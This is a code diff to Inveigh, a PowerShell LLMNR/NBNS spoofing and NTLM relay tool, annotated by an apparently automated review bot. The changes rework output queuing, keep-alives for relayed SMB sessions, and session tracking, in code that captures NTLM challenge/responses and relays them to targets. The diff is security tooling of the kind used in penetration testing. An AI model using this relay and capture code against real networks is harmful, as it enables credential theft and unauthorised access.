Add-Member -InputObject $session_object -MemberType NoteProperty -Name Target $SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString
@@ -3347,12 +3401,12 @@ $HTTP_scriptblock =
Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Established" $(Get-Date -format s)
Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $(Get-Date -format s)
$inveigh.session_list += $session_object
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sesion $($inveigh.session_count) added to session list")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sesion $($inveigh.session_count) added to session list") > $null
$inveigh.session_count++
}
else
{
- SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID
+ SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID $process_ID_bytes
}
}
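Review bot: The rewritten output line keeps the typo in the operator-facing message: `Sesion $($inveigh.session_count) added to session list` should read `Session $($inveigh.session_count) added to session list`. Log lines are what an operator later searches, so a misspelled keyword is worth fixing while the line is being touched. The enclosing session-creation block starts in the previous hunk.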
@@ -3362,7 +3416,7 @@ $HTTP_scriptblock =
}
else
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has reached session limit on $Target")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has reached session limit on $Target") > $null
$SMB_relay_socket.Close()
$relay_step = 0
}
@@ -3370,7 +3424,7 @@ $HTTP_scriptblock =
}
else
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has already been tried on $Target")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has already been tried on $Target") > $null
$SMB_relay_socket.Close()
$relay_step = 0
}
@@ -3378,7 +3432,7 @@ $HTTP_scriptblock =
}
else
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Aborting relay since $HTTP_NTLM_user_string appears to be a machine account") > $null
$SMB_relay_socket.Close()
$relay_step = 0
}
@@ -3386,7 +3440,7 @@ $HTTP_scriptblock =
}
else
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full not on relay username list")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full not on relay username list") > $null
$SMB_relay_socket.Close()
$relay_step = 0
}
@@ -3506,6 +3560,7 @@ $control_relay_scriptblock =
function SigningCheck
{
+ $process_ID_bytes = Get-ProcessIDArray
$target_list = $inveigh.target_list
ForEach($target_entry in $target_list)
@@ -3520,7 +3575,7 @@ $control_relay_scriptblock =
}
else
{
- SMBRelayChallenge $SMB_relay_socket $null '$SMB1' $true > $null
+ SMBRelayChallenge $SMB_relay_socket $null '$SMB1' $true $process_ID_bytes > $null
}
}
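Review bot: The third argument to `SMBRelayChallenge` is the single-quoted literal `'$SMB1'`, which PowerShell passes as the five-character string `$SMB1`, not the value of the `$SMB1` switch; if `SMBRelayChallenge` picks the dialect with a comparison like `$SMB_version -eq 'SMB1'` (its body is outside this diff) the signing check never negotiates SMB1. If the probe is meant to always use SMB2, pass that deliberately and say so in a comment; otherwise pass the variable unquoted. `SigningCheck` starts in the previous hunk and ends outside this one.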
@@ -3535,13 +3590,9 @@ $control_relay_scriptblock =
function OutputQueueLoop
{
- while($inveigh.output_queue.Count -gt 0)
+ while($inveigh.output_queue.Count -gt 0 -and $inveigh.output_pause)
{
-
- if($inveigh.console_output)
- {
- $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
- }
+ $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
if($inveigh.file_output)
{
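Review bot: The new loop condition in Inveigh-Relay.ps1, `while($inveigh.output_queue.Count -gt 0 -and $inveigh.output_pause)`, has the opposite polarity to the same function in Inveigh.ps1 in this commit, `while($inveigh.output_queue.Count -gt 0 -and !$inveigh.output_pause)`. As written the relay drains its output queue only while a pause is in effect, and never drains it when the flag was never set — the relay's startup hunk assigns `$inveigh.output_pause` only under `if($inveigh.running)`, so a standalone relay would leave it unset and falsy unless a default is set somewhere outside this diff. Unless the inversion is intentional, this should be `while($inveigh.output_queue.Count -gt 0 -and !$inveigh.output_pause)`. Dropping the `console_output` gate also means the console queue is now fed unconditionally, which looks intended but deserves a comment.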
@@ -3649,27 +3700,6 @@ $control_relay_scriptblock =
while($inveigh.relay_running)
{
-
- while($inveigh.output_queue.Count -gt 0)
- {
-
- if($inveigh.console_output)
- {
- $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
- }
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($inveigh.output_queue[0]) > $null
- }
-
- $inveigh.output_queue.RemoveAt(0)
- }
if($RelayAutoExit -eq 'Y' -and !$inveigh.SMB_relay)
{
@@ -3732,6 +3762,7 @@ $control_relay_scriptblock =
}
+ OutputQueueLoop
Start-Sleep -m 5
}
@@ -3742,6 +3773,8 @@ $session_refresh_scriptblock =
{
param ($SessionRefresh)
+ $process_ID_bytes = Get-ProcessIDArray
+
while($inveigh.relay_running)
{
@@ -3762,12 +3795,9 @@ $session_refresh_scriptblock =
$SMB2_message_ID = $inveigh.session_message_ID_table[$session]
$SMB2_tree_ID = 0x00,0x00,0x00,0x00
$SMB_client_receive = New-Object System.Byte[] 1024
- $SMB_path = "\\" + $inveigh.session_socket_table[$session].Client.RemoteEndpoint.Address.IPaddressToString + "\IPC$"
- $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- #$packet_SMB2_header["ProcessID"] = $process_ID_bytes
- $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x0D,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2Echo
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
$packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
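Review bot: The keep-alive now sends opcode `0x0D,0x00`, the SMB2 ECHO command, but the only explanation lives in the commit message; the header line should carry something like `# SMB2 ECHO (0x000D): keeps the relayed session alive without touching a share; second field (presumably the credit request) lowered to 1`. The hunk increments `$SMB2_message_ID` but the write-back to `$inveigh.session_message_ID_table[$session]` is outside the hunk, so it is worth confirming the incremented value is stored, otherwise the next refresh reuses a message ID the server has already consumed. The enclosing refresh loop starts in the previous hunk and ends outside this one.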
@@ -3782,7 +3812,7 @@ $session_refresh_scriptblock =
}
catch
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay SMB session $session has closed")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay SMB session $session has closed") > $null
}
$inveigh.session_lock_table[$Session] = 'open'
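Review bot: The `catch` only logs that the session has closed; nothing in the hunk marks the session as unusable, and the target-selection code in the HTTP scriptblock counts entries with `Status -eq 'connected'` against `$SessionLimit`, so unless the status is updated elsewhere (outside this diff) a dead session keeps counting and stays selectable. Consider setting the matching session object's `Status` to a non-`connected` value inside the `catch`, next to the log line. The `try` this `catch` belongs to opens in the previous hunk.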
@@ -3791,12 +3821,12 @@ $session_refresh_scriptblock =
}
$session++
+ Start-Sleep -s 1
}
-
-
+
}
- Start-Sleep -m 5
+ Start-Sleep -s 1
}
}
@@ -4358,6 +4388,9 @@ Get captured POST requests.
.PARAMETER POSTRequestUnique
Get unique captured POST request.
+
+.PARAMETER Session
+Get relay session list.
#>
[CmdletBinding()]
diff --git a/Inveigh.ps1 b/Inveigh.ps1
index 0ab78a1..5a8a791 100644
--- a/Inveigh.ps1
+++ b/Inveigh.ps1
@@ -484,13 +484,11 @@ if(!$inveigh)
$inveigh.requested_host_list = New-Object System.Collections.ArrayList
$inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
$inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.session_list = @()
$inveigh.session_socket_table = [HashTable]::Synchronized(@{})
$inveigh.session_table = [HashTable]::Synchronized(@{})
$inveigh.session_message_ID_table = [HashTable]::Synchronized(@{})
- $inveigh.session_user_table = [HashTable]::Synchronized(@{})
- $inveigh.session_timestamp_table = [HashTable]::Synchronized(@{})
$inveigh.session_lock_table = [HashTable]::Synchronized(@{})
- $inveigh.session_privilege_table = [HashTable]::Synchronized(@{})
$inveigh.session_count = 0
}
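Review bot: `$inveigh.session_list = @()` replaces three `[HashTable]::Synchronized` tables with a plain array that Inveigh-Relay.ps1 appends with `$inveigh.session_list += $session_object` from the HTTP runspace while the session-refresh and target-selection code enumerate it. `+=` on an array is a read-copy-replace, so two concurrent additions can lose one, a risk the synchronized tables it replaces did not have. If more than one relay can add sessions at once, `$inveigh.session_list = [System.Collections.ArrayList]::Synchronized((New-Object System.Collections.ArrayList))` with `.Add` keeps this block's access pattern consistent with its other collections.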
@@ -691,6 +689,11 @@ else
$inveigh.newline = ""
}
+if($inveigh.relay_running)
+{
+ $inveigh.output_pause = $true
+}
+
# Write startup messages
$inveigh.output_queue.Add("[*] Inveigh $inveigh_version started at $(Get-Date -format s)") > $null
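Review bot: `$inveigh.output_pause = $true` is set for a running relay before the startup messages are queued and is only cleared in the later hunk (`$inveigh.output_pause = $false` after the startup `while($inveigh.output_queue.Count -gt 0)` drain), so anything that exits the script between the two leaves the relay's output paused until the flag is reset by hand. Either set the flag immediately before the drain loop or clear it on the exit paths as well. Note also that the relay's own `OutputQueueLoop` in this commit tests the flag without negation, so the pause currently has opposite effects on the two scripts.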
@@ -1342,6 +1345,11 @@ while($inveigh.output_queue.Count -gt 0)
}
+if($inveigh.relay_running)
+{
+ $inveigh.output_pause = $false
+}
+
# Begin ScriptBlocks
# Shared Basic Functions ScriptBlock
@@ -1588,7 +1596,7 @@ $SMB_NTLM_functions_scriptblock =
}
else
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string [not unique]") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
@@ -1624,7 +1632,7 @@ $SMB_NTLM_functions_scriptblock =
}
else
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string [not unique]") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
@@ -1977,6 +1985,7 @@ $HTTP_scriptblock =
$HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes
$HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes
$HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
+ $HTTP_username_full = $HTTP_NTLM_domain_string + "\" + $HTTP_NTLM_user_string
if($HTTP_NTLM_length -eq 24) # NTLMv1
{
@@ -1988,24 +1997,24 @@ $HTTP_scriptblock =
{
$inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) > $null
- if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))
{
$inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null
}
else
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null
}
- if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")))
{
$inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) > $null
}
- if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")
{
- $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") > $null
+ $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null
}
}
@@ -2021,24 +2030,24 @@ $HTTP_scriptblock =
{
$inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) > $null
- if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))
{
$inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null
}
else
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null
}
- if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")))
{
$inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) > $null
}
- if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")
{
- $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") > $null
+ $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null
}
}
@@ -3413,13 +3422,9 @@ $control_scriptblock =
function OutputQueueLoop
{
- while($inveigh.output_queue.Count -gt 0)
+ while($inveigh.output_queue.Count -gt 0 -and !$inveigh.output_pause)
{
-
- if($inveigh.console_output)
- {
- $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
- }
+ $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
if($inveigh.file_output)
{
@@ -3618,7 +3623,7 @@ $control_scriptblock =
# Begin Startup Functions
# HTTP Listener Startup Function
-function HTTPListener()
+function HTTPListener
{
$proxy_listener = $false
$HTTPS_listener = $false
@@ -3641,7 +3646,7 @@ function HTTPListener()
Start-Sleep -m 50
# HTTPS Listener Startup Function
-function HTTPSListener()
+function HTTPSListener
{
$proxy_listener = $false
$HTTPS_listener = $true
@@ -3664,7 +3669,7 @@ function HTTPSListener()
Start-Sleep -m 50
# Proxy Listener Startup Function
-function ProxyListener()
+function ProxyListener
{
$proxy_listener = $true
$HTTPS_listener = $false
@@ -3685,7 +3690,7 @@ function ProxyListener()
}
# Sniffer/Spoofer Startup Function
-function SnifferSpoofer()
+function SnifferSpoofer
{
if($inveigh.DNS)
@@ -3720,7 +3725,7 @@ function SnifferSpoofer()
}
# Unprivileged LLMNR Spoofer Startup Function
-function LLMNRSpoofer()
+function LLMNRSpoofer
{
if($inveigh.DNS)
@@ -3751,7 +3756,7 @@ function LLMNRSpoofer()
}
# Unprivileged mDNS Spoofer Startup Function
-function mDNSSpoofer()
+function mDNSSpoofer
{
$mDNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$mDNS_spoofer_runspace.Open()
@@ -3768,7 +3773,7 @@ function mDNSSpoofer()
}
# Unprivileged NBNS Spoofer Startup Function
-function NBNSSpoofer()
+function NBNSSpoofer
{
if($inveigh.DNS)
@@ -3799,7 +3804,7 @@ function NBNSSpoofer()
}
# NBNS Brute Force Spoofer Startup Function
-function NBNSBruteForceSpoofer()
+function NBNSBruteForceSpoofer
{
$NBNS_bruteforce_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$NBNS_bruteforce_spoofer_runspace.Open()
@@ -3814,7 +3819,7 @@ function NBNSBruteForceSpoofer()
}
# Control Loop Startup Function
-function ControlLoop()
+function ControlLoop
{
if($inveigh.DNS)
{
@@ -4327,214 +4332,204 @@ Get captured POST requests.
.PARAMETER POSTRequestUnique
Get unique captured POST request.
-#>
-
-[CmdletBinding()]
-param
-(
- [parameter(Mandatory=$false)][Switch]$Cleartext,
- [parameter(Mandatory=$false)][Switch]$CleartextUnique,
- [parameter(Mandatory=$false)][Switch]$Console,
- [parameter(Mandatory=$false)][Switch]$DNS,
- [parameter(Mandatory=$false)][Switch]$DNSFailed,
- [parameter(Mandatory=$false)][Switch]$Learning,
- [parameter(Mandatory=$false)][Switch]$Log,
- [parameter(Mandatory=$false)][Switch]$NTLMv1,
- [parameter(Mandatory=$false)][Switch]$NTLMv2,
- [parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
- [parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
- [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
- [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
- [parameter(Mandatory=$false)][Switch]$POSTRequest,
- [parameter(Mandatory=$false)][Switch]$POSTRequestUnique,
- [parameter(Mandatory=$false)][Switch]$Session,
- [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-if($Console -or $PSBoundParameters.Count -eq 0)
-{
+.PARAMETER Session
+Get relay session list.
+#>
- while($inveigh.console_queue.Count -gt 0)
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][Switch]$Cleartext,
+ [parameter(Mandatory=$false)][Switch]$CleartextUnique,
+ [parameter(Mandatory=$false)][Switch]$Console,
+ [parameter(Mandatory=$false)][Switch]$DNS,
+ [parameter(Mandatory=$false)][Switch]$DNSFailed,
+ [parameter(Mandatory=$false)][Switch]$Learning,
+ [parameter(Mandatory=$false)][Switch]$Log,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
+ [parameter(Mandatory=$false)][Switch]$POSTRequest,
+ [parameter(Mandatory=$false)][Switch]$POSTRequestUnique,
+ [parameter(Mandatory=$false)][Switch]$Session,
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+ )
+
+ if($Console -or $PSBoundParameters.Count -eq 0)
{
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveAt(0)
- }
- else
+ while($inveigh.console_queue.Count -gt 0)
{
- switch -wildcard ($inveigh.console_queue[0])
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ $inveigh.console_queue.RemoveAt(0)
+ }
+ else
{
- {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ switch -wildcard ($inveigh.console_queue[0])
{
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
- default
- {
- Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ default
+ {
+ Write-Output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
}
}
-
+
}
-
- }
-
-}
-if($DNS)
-{
+ }
- foreach($DNS in $inveigh.DNS_list)
+ if($DNS)
{
-
- if($DNS.StartsWith("1,"))
+
+ foreach($DNS in $inveigh.DNS_list)
{
- Write-Output $DNS.Substring(2)
+
+ if($DNS.StartsWith("1,"))
+ {
+ Write-Output $DNS.Substring(2)
+ }
+
}
}
-}
-
-if($DNSFailed)
-{
-
- foreach($DNS in $inveigh.DNS_list)
+ if($DNSFailed)
{
-
- if($DNS.StartsWith("0,"))
+
+ foreach($DNS in $inveigh.DNS_list)
{
- Write-Output $DNS.Substring(2)
+
+ if($DNS.StartsWith("0,"))
+ {
+ Write-Output $DNS.Substring(2)
+ }
+
}
}
-}
-
-if($Log)
-{
- Write-Output $inveigh.log
-}
-
-if($NTLMv1)
-{
- Write-Output $inveigh.NTLMv1_list
-}
+ if($Log)
+ {
+ Write-Output $inveigh.log
+ }
-if($NTLMv1Unique)
-{
- $inveigh.NTLMv1_list.Sort()
+ if($NTLMv1)
+ {
+ Write-Output $inveigh.NTLMv1_list
+ }
- foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+ if($NTLMv1Unique)
{
- $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+ $inveigh.NTLMv1_list.Sort()
- if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+ foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
{
- Write-Output $unique_NTLMv1
- }
+ $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
- $unique_NTLMv1_account_last = $unique_NTLMv1_account
- }
+ if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+ {
+ Write-Output $unique_NTLMv1
+ }
-}
+ $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ }
-if($NTLMv1Usernames)
-{
- Write-Output $inveigh.NTLMv2_username_list
-}
+ }
-if($NTLMv2)
-{
- Write-Output $inveigh.NTLMv2_list
-}
+ if($NTLMv1Usernames)
+ {
+ Write-Output $inveigh.NTLMv2_username_list
+ }
-if($NTLMv2Unique)
-{
- $inveigh.NTLMv2_list.Sort()
+ if($NTLMv2)
+ {
+ Write-Output $inveigh.NTLMv2_list
+ }
- foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
+ if($NTLMv2Unique)
{
- $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+ $inveigh.NTLMv2_list.Sort()
- if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
{
- Write-Output $unique_NTLMv2
- }
+ $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
- $unique_NTLMv2_account_last = $unique_NTLMv2_account
- }
+ if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ {
+ Write-Output $unique_NTLMv2
+ }
-}
+ $unique_NTLMv2_account_last = $unique_NTLMv2_account
+ }
-if($NTLMv2Usernames)
-{
- Write-Output $inveigh.NTLMv2_username_list
-}
+ }
-if($Cleartext)
-{
- Write-Output $inveigh.cleartext_list
-}
+ if($NTLMv2Usernames)
+ {
+ Write-Output $inveigh.NTLMv2_username_list
+ }
-if($CleartextUnique)
-{
- Write-Output $inveigh.cleartext_list | Get-Unique
-}
+ if($Cleartext)
+ {
+ Write-Output $inveigh.cleartext_list
+ }
-if($POSTRequest)
-{
- Write-Output $inveigh.POST_request_list
-}
+ if($CleartextUnique)
+ {
+ Write-Output $inveigh.cleartext_list | Get-Unique
+ }
-if($POSTRequestUnique)
-{
- Write-Output $inveigh.POST_request_list | Get-Unique
-}
+ if($POSTRequest)
+ {
+ Write-Output $inveigh.POST_request_list
+ }
-if($Learning)
-{
- Write-Output $inveigh.valid_host_list
-}
+ if($POSTRequestUnique)
+ {
+ Write-Output $inveigh.POST_request_list | Get-Unique
+ }
-if($Session)
-{
- $i = 1
- $session_list = @()
+ if($Learning)
+ {
+ Write-Output $inveigh.valid_host_list
+ }
- while($i -le $inveigh.session_socket_table.Count)
+ if($Session)
{
+ $i = 0
- if($inveigh.session_socket_table[$i].Connected)
- {
- $status = "connected"
- }
- else
+ while($i -lt $inveigh.session_socket_table.Count)
{
- $status = "disconnected"
+
+ if(!$inveigh.session_socket_table[$i].Connected)
+ {
+ $inveigh.session_list[$i] | Where-Object {$_.Status = "disconnected"}
+ }
+
+ $i++
}
- $session_object = New-Object PSObject
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $i
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name System $inveigh.session_socket_table[$i].Client.RemoteEndpoint.Address.IPaddressToString
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name User $inveigh.session_user_table[$i]
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Admin $inveigh.session_privilege_table[$i]
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Status $status
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $inveigh.session_timestamp_table[$i]
- $session_list += $session_object
- $i++
+ Write-Output $inveigh.session_list | Format-Table -AutoSize
}
- Write-Output $session_list | Format-Table -AutoSize
-}
-
}
function Watch-Inveigh
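Review bot: `$inveigh.session_list[$i] | Where-Object {$_.Status = "disconnected"}` puts an assignment inside the filter block; it mutates the entry as a side effect, but the block yields no boolean, so nothing passes the filter and the line reads like a typo for `-eq`. The intent appears to be a plain property write, `$inveigh.session_list[$i].Status = "disconnected"`. Unlike the removed code, nothing here ever sets a status back to "connected", so a session that reconnects may keep showing as disconnected unless another part of the script updates that field. Separately, the `-NTLMv1Usernames` branch still writes `$inveigh.NTLMv2_username_list`, which looks like a copy-paste slip the commit carried over. Get-Inveigh's definition begins before this hunk.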
diff --git a/Invoke-SMBClient.ps1 b/Invoke-SMBClient.ps1
index 1db92e5..367969d 100644
--- a/Invoke-SMBClient.ps1
+++ b/Invoke-SMBClient.ps1
@@ -156,6 +156,8 @@ function New-PacketSMBHeader
{
param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
+ $packet_process_ID = $packet_process_ID[0,1]
+
$packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
$packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
$packet_SMBHeader.Add("Command",$packet_command)
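Review bot: `$packet_process_ID = $packet_process_ID[0,1]` silently drops everything past the first two bytes of a parameter declared as `[Byte[]]`, and nothing documents that callers now pass the full process-id byte array built at the call site; the same line is added to Invoke-SMBExec's New-PacketSMBHeader (hunk at L1796). A one-line comment would make the contract explicit: `# only the first two bytes of the process id are placed in the SMB1 header; the rest is discarded`. The function continues past this hunk.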
@@ -209,7 +211,7 @@ function New-PacketSMBNegotiateProtocolRequest
function New-PacketSMB2Header
{
- param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
+ param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
[Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
